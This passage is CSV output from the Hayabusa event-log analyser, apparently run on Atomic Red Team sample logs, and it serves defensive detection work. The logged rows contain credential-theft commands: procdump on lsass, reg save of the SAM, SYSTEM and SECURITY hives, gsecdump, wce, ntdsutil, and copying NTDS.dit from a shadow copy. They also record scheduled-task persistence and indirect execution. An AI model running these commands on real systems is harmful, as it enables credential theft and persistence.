""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task 
Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 
+09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory 
Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM 
C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 